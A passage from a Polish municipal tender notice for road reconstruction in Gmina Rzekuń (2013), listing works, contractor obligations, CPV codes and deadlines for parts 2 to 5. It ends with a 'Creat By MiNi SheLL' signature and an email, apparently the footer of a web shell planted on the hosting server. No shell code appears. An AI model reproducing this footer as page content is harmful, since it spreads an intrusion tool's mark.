wykonanie warstwy mrozoochronnej z pospółki  zagęszczanej mechanicznie;
wykonanie dolnej warstwy podbudowy z kruszywa naturalnego (warstwa odsączająca) zagęszczanej mechanicznie, fr. 0/31,50mm;
wykonanie warstwy podbudowy z kruszywa łamanego zagęszczanej  mechanicznie, fr. 0/31,50mm, pod konstrukcję jezdni i zjazdów na drogi boczne;
wykonanie nawierzchni bitumicznej warstwy wiążącej  AC11W gr. 4cm pod jezdnię główną i zjazdy na drogi boczne;
wykonanie poboczy obustronnych stabilizowanych mechanicznie z  kruszywa naturalnego fr. 031,50mm;
wykonanie zjazdów na działki z kruszywa łamanego zagęszczanego mechanicznie fr. 031,50mm;
wykonanie oznakowania pionowego i poziomego;
regulacja wysokościowa zaworów wodociągowych;
regulacja wysokościowa włazów kanalizacji sanitarnej;
wykonanie brakującej infrastruktury sanitarnej wg projektów budowlanych, do budowy infrastruktury wodociągowej używać kształtek i uzbrojenia z żeliwa sferoidalnego;
wykonanie rurociągu drenarskiego o średnicy 150 mm w otulinie z geowłókniny i obsypce 50x50 cm ze żwiru frakcji 16-32 mm ul. Polna - 400 m  wraz z montażem czterech studzienek inspekcyjnych z osadnikami o gł. 1,0 m z tworzywa sztucznego o średnicy 400 mm na trasie rurociągu zwieńczonych pierścieniem odciążającym, stożkiem betonowym oraz włazem  żeliwnym  klasy D 400;
wbudowanie 2 szt, betonowych studzienek ściekowych o śr. 500mm z kratą żeliwną z żeliwa sferoidalnego na płycie betonowej wraz z utwardzeniem nawierzchni terenu wokół krat kostka betonową o gr. 8 cm o łącznej powierzchni 3 m2 i zamknięciem obrzeżem betonowym 8x30 cm;
uporządkować obręb pasa drogowego po wykonanych robotach tj. oczyścić, rozplantować i wyrównać nadmiary gruntu; 
ustawienie krawężnika betonowego 15x30cm na ławie cementowo - piaskowej;
wykonanie badań wody.
UWAGA:
 W ramach niniejszego zadania nie przewiduje się wykonania warstwy ścieralnej.
Zamawiający wymaga wykonania zjazdów na działki, posesje wyłącznie z kruszywa łamanego.
4.W ramach zamówienia dla pięciu części Wykonawca będzie zobowiązany również do: 
udzielenia gwarancji na wykonane roboty budowlane na okres 60 m-cy licząc od dnia końcowego odbioru robót;
prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych;
wykonania na własny koszt wytyczenia trasy drogi, oraz obsługi geodezyjnej; 
wykonania na własny koszt inwentaryzacji geodezyjnej powykonawczej zatwierdzonej w PODGiK w 3 egzemplarzach;
przedstawienia do akceptacji przed przystąpieniem do robót aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane urządzenia i materiały budowlane; 
przedstawienia protokołów badań gruntu (wskaźnik zagęszczenia);
poniesienia  kosztów opracowania projektu czasowej organizacji ruchu na czas prowadzenia robót;
dokonania napraw wszelkich zniszczeń powstałych w trakcie realizacji zamówienia na własny koszt, swoim staraniem i w ramach niniejszego zamówienia;
odtworzenia uszkodzonych lub zniszczonych punktów geodezyjnych na własny koszt;
zamówienie powinno być zrealizowane zgodnie z obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi, z materiałów dostarczonych przez Wykonawcę, odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania  w budownictwie, określonych w ustawie Prawo Budowlane tj. posiadających certyfikat;
zapewnienia przejezdności dróg i utrzymania bezpieczeństwa terenu budowy, oraz robót poza placem budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób nieupoważnionych zapewniając bezpieczne dojścia i dojazdy do istniejących posesji;
ewentualne zastosowane nazwy producentów w dokumentacji przetargowej służą doprecyzowaniu przedmiotu zamówienia. Wszystkie parametry w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych określone są na poziomie minimalnym, tzn. Zamawiający dopuszcza zastosowanie materiałów o parametrach równoważnych czyli co najmniej takich jak podano w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót lecz nie gorszych;
zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty; 
Wykonawca zrealizuje roboty zgodnie z zakresem rzeczowym ujętym w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz specyfikacji istotnych warunków zamówienia.
a) Inne informacje
Zamawiający żąda wykonania nawierzchni bitumicznej jednolitej bezszwowej
Ewentualny nadmiar urobku z korytowania odwieść na miejsce wskazane przez Zamawiającego na terenie Gminy Rzekuń.
Szczegółowy zakres robót do wykonania zawiera SIWZ i załączone do niej projekty budowlane, specyfikacje techniczne wykonania i odbioru robót budowlanych oraz przedmiary robót. Przedmiot zamówienia należy wykonać na podstawie ww dokumentów zgodnie z obowiązującymi normami, przepisami.
5. Każdy z wykonawców zamówienia może złożyć ofertę na wszystkie części zamówienia lub na jedną z części..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa ul. Leśnej na odcinku 363,40 mb. oraz drogi gminnej dz. nr 450 na odcinku 652,00 mb. w Czarnowcu na terenie Gminy Rzekuń  z uzupełnieniem brakującej infrastruktury technicznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ul. Leśnej oraz drogi gminnej dz. nr 450 w Czarnowcu na terenie Gminy Rzekuń z uzupełnieniem brakującej infrastruktury technicznej.
a) Niniejsze zadanie obejmuje wykonanie następujących rodzajów robót:
roboty pomiarowe i przygotowawcze;
roboty ziemne związane z wykonaniem odhumusowania, muld trawiastych, nasypów, korytowaniem; 
karczowanie pni, zagajników średniej gęstości z oczyszczeniem i wywiezieniem pozostałości po karczowaniu;
roboty rozbiórkowe związane z rozebraniem istniejącego przepustu betonowego O800 mm;
wykonanie nowego przepustu z rury WIPRO O800 mm dł. 7,50m z betonowymi  ściankami czołowymi na wlocie i wylocie przepustu;
wykonanie warstwy podbudowy z kruszywa łamanego zagęszczanego  mechanicznie, fr. 0 31,50 mm pod konstrukcję jezdni;
wykonanie nawierzchni bitumicznej warstwy wiążącej  AC11W gr. 4 cm;
wykonanie poboczy obustronnych stabilizowanych mechanicznie z kruszywa naturalnego fr. 0 31,50mm;
wykonanie zjazdów na działki z kruszywa łamanego zagęszczanego mechanicznie fr. 031,50 mm;
regulacja wysokościowa zaworów wodociągowych;
regulacja wysokościowa włazów kanalizacji sanitarnej;
wykonanie oznakowania pionowego i poziomego;
wykonanie brakującej infrastruktury sanitarnej wg projektu budowlanego, do budowy infrastruktury wodociągowej używać kształtek i uzbrojenia z żeliwa sferoidalnego.
UWAGA: 
Przedmiar robót nie obejmuje odcinka na km 0+635,00 do 0+663,50. 
W ramach niniejszego zadania nie przewiduje się wykonania warstwy ścieralnej.
4.W ramach zamówienia dla pięciu części Wykonawca będzie zobowiązany również do: 
udzielenia gwarancji na wykonane roboty budowlane na okres 60 m-cy licząc od dnia końcowego odbioru robót;
prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych;
wykonania na własny koszt wytyczenia trasy drogi, oraz obsługi geodezyjnej; 
wykonania na własny koszt inwentaryzacji geodezyjnej powykonawczej zatwierdzonej w PODGiK w 3 egzemplarzach;
przedstawienia do akceptacji przed przystąpieniem do robót aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane urządzenia i materiały budowlane; 
przedstawienia protokołów badań gruntu (wskaźnik zagęszczenia);
poniesienia  kosztów opracowania projektu czasowej organizacji ruchu na czas prowadzenia robót;
dokonania napraw wszelkich zniszczeń powstałych w trakcie realizacji zamówienia na własny koszt, swoim staraniem i w ramach niniejszego zamówienia;
odtworzenia uszkodzonych lub zniszczonych punktów geodezyjnych na własny koszt;
zamówienie powinno być zrealizowane zgodnie z obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi, z materiałów dostarczonych przez Wykonawcę, odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania  w budownictwie, określonych w ustawie Prawo Budowlane tj. posiadających certyfikat;
zapewnienia przejezdności dróg i utrzymania bezpieczeństwa terenu budowy, oraz robót poza placem budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób nieupoważnionych zapewniając bezpieczne dojścia i dojazdy do istniejących posesji;
ewentualne zastosowane nazwy producentów w dokumentacji przetargowej służą doprecyzowaniu przedmiotu zamówienia. Wszystkie parametry w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych określone są na poziomie minimalnym, tzn. Zamawiający dopuszcza zastosowanie materiałów o parametrach równoważnych czyli co najmniej takich jak podano w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót lecz nie gorszych;
zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty; 
Wykonawca zrealizuje roboty zgodnie z zakresem rzeczowym ujętym w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz specyfikacji istotnych warunków zamówienia.
a) Inne informacje
Zamawiający żąda wykonania nawierzchni bitumicznej jednolitej bezszwowej
Ewentualny nadmiar urobku z korytowania odwieść na miejsce wskazane przez Zamawiającego na terenie Gminy Rzekuń.
Szczegółowy zakres robót do wykonania zawiera SIWZ i załączone do niej projekty budowlane, specyfikacje techniczne wykonania i odbioru robót budowlanych oraz przedmiary robót. Przedmiot zamówienia należy wykonać na podstawie w/w dokumentów zgodnie z obowiązującymi normami, przepisami.
5. Każdy z wykonawców zamówienia może złożyć ofertę na wszystkie części zamówienia lub na jedną z części..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przebudowa ul. Topolowej na odcinku o łącznej długości 360,00 z uzupełnieniem brakującej infrastruktury technicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przebudowa ul. Topolowej w Rzekuniu z uzupełnieniem brakującej infrastruktury technicznej.
a) Niniejsze zadanie obejmuje wykonanie następujących rodzajów robót:
roboty pomiarowe i przygotowawcze;
roboty ziemne związane z wykonaniem ohumusowania, muld trawiastych, korytowaniem; 
wykonanie dolnej warstwy podbudowy z kruszywa naturalnego (warstwa odsączająca) zagęszczanej mechanicznie;
wbudowanie 2 szt, betonowych studzienek ściekowych o śr. 500 mm z kratą żeliwną z żeliwa sferoidalnego D400 na płycie betonowej;
wykonanie kanału rozsączającego z rur drenarskich perforowanych O160mm w otulinie z geowłókniny;  
wykonanie warstwy podbudowy z kruszywa łamanego zagęszczanego  mechanicznie, fr. 0 31,50mm, pod konstrukcję jezdni;
wykonanie nawierzchni bitumicznej warstwy wiążącej  AC11W gr. 4cm;
wykonanie poboczy obustronnych stabilizowanych mechanicznie z  kruszywa naturalnego fr. 0 31,50mm;
wykonanie zjazdów na działki z kruszywa łamanego zagęszczanego mechanicznie fr. 0 31,50mm;
wykonanie oznakowania pionowego i poziomego;
regulacja wysokościowa zaworów wodociągowych i gazowych;
regulacja wysokościowa włazów kanalizacji sanitarnej;
wykonanie brakującej infrastruktury sanitarnej wg projektu budowlanego, do budowy infrastruktury wodociągowej używać kształtek i uzbrojenia z żeliwa sferoidalnego.
UWAGA: 
Przebudowa ul. Topolowej nie obejmuje wykonania odcinków e-f i g-h
W ramach niniejszego zadania nie przewiduje się wykonania warstwy ścieralnej.
4.W ramach zamówienia dla pięciu części Wykonawca będzie zobowiązany również do: 
udzielenia gwarancji na wykonane roboty budowlane na okres 60 m-cy licząc od dnia końcowego odbioru robót;
prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych;
wykonania na własny koszt wytyczenia trasy drogi, oraz obsługi geodezyjnej; 
wykonania na własny koszt inwentaryzacji geodezyjnej powykonawczej zatwierdzonej w PODGiK w 3 egzemplarzach;
przedstawienia do akceptacji przed przystąpieniem do robót aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane urządzenia i materiały budowlane; 
przedstawienia protokołów badań gruntu (wskaźnik zagęszczenia);
poniesienia  kosztów opracowania projektu czasowej organizacji ruchu na czas prowadzenia robót;
dokonania napraw wszelkich zniszczeń powstałych w trakcie realizacji zamówienia na własny koszt, swoim staraniem i w ramach niniejszego zamówienia;
odtworzenia uszkodzonych lub zniszczonych punktów geodezyjnych na własny koszt;
zamówienie powinno być zrealizowane zgodnie z obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi, z materiałów dostarczonych przez Wykonawcę, odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania  w budownictwie, określonych w ustawie Prawo Budowlane tj. posiadających certyfikat;
zapewnienia przejezdności dróg i utrzymania bezpieczeństwa terenu budowy, oraz robót poza placem budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób nieupoważnionych zapewniając bezpieczne dojścia i dojazdy do istniejących posesji;
ewentualne zastosowane nazwy producentów w dokumentacji przetargowej służą doprecyzowaniu przedmiotu zamówienia. Wszystkie parametry w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych określone są na poziomie minimalnym, tzn. Zamawiający dopuszcza zastosowanie materiałów o parametrach równoważnych czyli co najmniej takich jak podano w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót lecz nie gorszych;
zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty; 
Wykonawca zrealizuje roboty zgodnie z zakresem rzeczowym ujętym w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz specyfikacji istotnych warunków zamówienia.
a) Inne informacje
Zamawiający żąda wykonania nawierzchni bitumicznej jednolitej bezszwowej
Ewentualny nadmiar urobku z korytowania odwieść na miejsce wskazane przez Zamawiającego na terenie Gminy Rzekuń.
Szczegółowy zakres robót do wykonania zawiera SIWZ i załączone do niej projekty budowlane, specyfikacje techniczne wykonania i odbioru robót budowlanych oraz przedmiary robót. Przedmiot zamówienia należy wykonać na podstawie w/w dokumentów zgodnie z obowiązującymi normami, przepisami.
5. Każdy z wykonawców zamówienia może złożyć ofertę na wszystkie części zamówienia lub na jedną z części..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przebudowa ul. Jaśminowej na odcinku 233,00 mb. w Rzekuniu z uzupełnieniem brakującej infrastruktury technicznej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Niniejsze zadanie obejmuje wykonanie następujących rodzajów robót:
roboty ziemne związane z wykonaniem ohumusowania, muld trawiastych, korytowaniem; 
regulacja wysokościowa zaworów wodociągowych oraz włazów kanalizacji sanitarnej;
wbudowanie 4 szt, betonowych studzienek ściekowych o śr. 500mm z kratą żeliwną z żeliwa sferoidalnego na płycie betonowej;
wykonanie kanału rozsączającego z rur drenarskich perforowanych PVC O200mm w obsypce żwirem fr. 8 16mm w otulinie z geowłókniny;  
wykonanie warstwy dolnej podbudowy z kruszywa naturalnego zagęszczanego  mechanicznie, fr. 0 31,5mm, pod konstrukcję jezdni;
wykonanie górnej warstwy podbudowy z kruszywa łamanego zagęszczanego  mechanicznie, fr. 0 31,50 mm, pod konstrukcję jezdni;
wykonanie nawierzchni bitumicznej warstwy wiążącej  AC11W gr. 4cm;
wykonanie poboczy obustronnych z kruszywa łamanego gr. 10 cm na podbudowie z kruszywa  naturalnego gr. 15 cm stabilizowanego mechanicznie szer. 2,00 m
wykonanie zjazdów na działki z kruszywa łamanego zagęszczanego mechanicznie fr. 0/31,50mm gr. 10cm, na podbudowie z kruszywa  naturalnego gr. 15cm; 
wykonanie przygotowania oraz ustawienia oznakowania pionowego;
wykonanie brakującej infrastruktury sanitarnej wg projektu budowlanego, do budowy infrastruktury wodociągowej używać kształtek i uzbrojenia z żeliwa sferoidalnego.
4.W ramach zamówienia dla pięciu części Wykonawca będzie zobowiązany również do: 
udzielenia gwarancji na wykonane roboty budowlane na okres 60 m-cy licząc od dnia końcowego odbioru robót;
prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych;
wykonania na własny koszt wytyczenia trasy drogi, oraz obsługi geodezyjnej; 
wykonania na własny koszt inwentaryzacji geodezyjnej powykonawczej zatwierdzonej w PODGiK w 3 egzemplarzach;
przedstawienia do akceptacji przed przystąpieniem do robót aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane urządzenia i materiały budowlane; 
przedstawienia protokołów badań gruntu (wskaźnik zagęszczenia);
poniesienia  kosztów opracowania projektu czasowej organizacji ruchu na czas prowadzenia robót;
dokonania napraw wszelkich zniszczeń powstałych w trakcie realizacji zamówienia na własny koszt, swoim staraniem i w ramach niniejszego zamówienia;
odtworzenia uszkodzonych lub zniszczonych punktów geodezyjnych na własny koszt;
zamówienie powinno być zrealizowane zgodnie z obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi, z materiałów dostarczonych przez Wykonawcę, odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania  w budownictwie, określonych w ustawie Prawo Budowlane tj. posiadających certyfikat;
zapewnienia przejezdności dróg i utrzymania bezpieczeństwa terenu budowy, oraz robót poza placem budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób nieupoważnionych zapewniając bezpieczne dojścia i dojazdy do istniejących posesji;
ewentualne zastosowane nazwy producentów w dokumentacji przetargowej służą doprecyzowaniu przedmiotu zamówienia. Wszystkie parametry w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych określone są na poziomie minimalnym, tzn. Zamawiający dopuszcza zastosowanie materiałów o parametrach równoważnych czyli co najmniej takich jak podano w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót lecz nie gorszych;
zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie niezbędnych informacji do sporządzenia oferty; 
Wykonawca zrealizuje roboty zgodnie z zakresem rzeczowym ujętym w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót oraz specyfikacji istotnych warunków zamówienia.
a) Inne informacje
Zamawiający żąda wykonania nawierzchni bitumicznej jednolitej bezszwowej
Ewentualny nadmiar urobku z korytowania odwieść na miejsce wskazane przez Zamawiającego na terenie Gminy Rzekuń.
Szczegółowy zakres robót do wykonania zawiera SIWZ i załączone do niej projekty budowlane, specyfikacje techniczne wykonania i odbioru robót budowlanych oraz przedmiary robót. Przedmiot zamówienia należy wykonać na podstawie w/w dokumentów zgodnie z obowiązującymi normami, przepisami.
5. Każdy z wykonawców zamówienia może złożyć ofertę na wszystkie części zamówienia lub na jedną z części..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com